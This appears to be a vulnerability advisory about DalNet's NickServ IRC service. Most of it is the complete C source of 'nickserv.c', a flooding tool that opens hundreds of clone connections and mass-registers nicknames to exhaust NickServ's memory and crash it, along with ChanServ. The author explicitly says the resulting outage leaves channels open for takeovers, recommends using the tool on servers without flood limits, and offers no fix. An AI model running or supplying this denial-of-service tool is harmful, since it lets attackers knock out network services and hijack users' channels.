COMMAND

    Nickname Services

SYSTEMS AFFECTED

    DalNet, CobraNet and other networks using program above

PROBLEM

    Gregory Taylor  posted (author  is Greg  |tantruM).   This program
    exploits  the  database  memory  error  bug  in  DalNet's Nickname
    Services (nickserv for short).  Additional credit goes to nyt  for
    his help,  greets to  omen, and  scarface_ and  special credit  to
    Osek and Commando for their previous work exploiting this bug.

    NickServ works like this... It takes a registration request from a
    User on DalNet,  stores it and  the password to  a database file..
    After a specific amount of time, it rereads that database  file...
    The idea of this is that NickServ will have a place to store these
    nicks without wasting memory.  That's where this exploit comes in.

    nickserv.c will send hundreds and hundreds of clones to flood  the
    NickServ before it resyncs...  Not only will NickServ lag, it will
    register each nick into its  database, well.. When you fill  a bag
    with double the amount of dirt that the bag can hold, the bag will
    overflow.. NickServ resyncs and reads the database file and stores
    all those nicks in its memory,  when you have 100 nicks on  dalnet
    stored (they  dont expect  you to  give them  many registrations),
    its ok.. but when you have  thousands of nicks stored at once  and
    re-read at once, it  overloads the NickServ's resync  code because
    it runs out of memory.   When this happens, NickServ will give  up
    and segmentation fault  and die.   Now the most  interesting thing
    about this is  that NickServ is  ran off the  same service as  the
    rest  of  the  DalNet  services  (chanserv  etc.)   When  NickServ
    dies, so does  chanserv, leaving channels  open for takeovers  and
    hell.  Exploit follows:

    /*
    NickServ.c v1.0 -:- NickServ Auto-Registration exploit.

	Based off of Sheep.C by nyt (nyt@deadpig.org)
	Modifications by Greg^ aka tantruM (graff@mkp.ml.org)

    This  program  exploits  the  Nickname Service's Auto-Registration
    code by  overloading it's  database and  causing it  to run out of
    memory  and  fault  out  due  to  lack  of  memory to continue its
    function on IRC.

    This program specifically  works on DalNet  but has been  known to
    work on  other networks  such as  CobraNet.   Use this  program on
    servers that do not put a restriction on Nickname flooding.

	Greets: nyt, scarface_, omen

    Thanks nyt, for giving me this code to modify, you are awesome! :P

    */

    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>
    #include <string.h>
    #include <netinet/in.h>
    #include <sys/socket.h>
    #include <netdb.h>
    #include <time.h>
    #define version "1.0"

    int socplace[500],a,z,clones,repeats,r,ststime;
    unsigned int targhost;
    struct sockaddr_in sawc[500];
    char b[4096],c[4096],d[4096],chan[100],signoff[300],command[1024];

    unsigned int lookup(char *host)
    {
      unsigned int addr;
      struct hostent *hostaddr;
      if((hostaddr=gethostbyname(host)) == NULL)
      {
	printf("could not resolve\n");
	exit(-1);
      }
      bcopy(*(hostaddr->h_addr_list),&(addr),sizeof(hostaddr->h_addr_list));
      return(addr);
    }

    void usage(char *progname)
    {
      printf("NickServ.c by Greg^ %s\n",version);
      printf("Based on coding of sheep.c by nyt <nyt@deadpig.org>\n");
      printf("Usage: nickserv <server> <port> <clones> <sleep>\n");
      exit(-1);
    }
    int main(int argc, char *argv[])
    {
      if(argc != 5) usage(argv[0]);
      targhost=lookup(argv[1]);
      clones=atoi(argv[3]);
      ststime=atoi(argv[4]);
      sprintf(signoff,"quit :NickServ.c by Greg^\n");
      printf("\E[2J\E[1;1H");
      printf("NickServ..c by Greg^ %s\n\n",version);
      printf("Server       : %s\n",argv[1]);
      printf("port         : %d\n",atoi(argv[2]));
      printf("Clones       : %d\n",clones);
      printf("Quit delay   : %d\n",ststime);
      printf("Nicknames: ");
      for(a=0;a!=clones;a++)
	{
	socplace[a]=socket(AF_INET, SOCK_STREAM, 0);
	sawc[a].sin_addr.s_addr = targhost;
	sawc[a].sin_family=AF_INET;
	sawc[a].sin_port=htons(atoi(argv[2]));
	  if(connect(socplace[a], (struct sockaddr *)&sawc[a], sizeof(sawc[1])) != 0)
	  {
	  perror("connect");
	  exit(-1);
	  }
	srand(a*time(NULL));
	r=rand();
	sprintf(b,"nick _%d\nuser n%d nope nope :n%d\n",r,r,r);
	write(socplace[a], b, strlen(b));
	printf("n%d, ",r);
	fflush(stdout);
	}
      putchar('\n');
      for(a=0;a!=clones;a++)
	{
	sprintf(c,"PRIVMSG NickServ :Register alkjfd\n");
	write(socplace[a], c, strlen(c));
	}
      for(a=0;a!=clones;a++)
	{
	for(z=0;z!=repeats;z++)
	  {
	  write(socplace[a], command, strlen(command));
	  }
	}
      printf("Now flooding Nickserv with massive registration connects.");
      fflush(stdout);
      sleep(ststime);
      printf("\nClosing connection....");
      fflush(stdout);
      strncpy(d,signoff,300);
      for(a=0;a!=clones;a++)
	{
	write(socplace[a], d, strlen(d));
	}
      sleep(10);
      printf("\nConnection closed. Attack has been completed.");
      fflush(stdout);
    return 0;
    }

SOLUTION

    No solution, but since this stuff has to do with IRC, I expect  to
    be fixed pretty soon.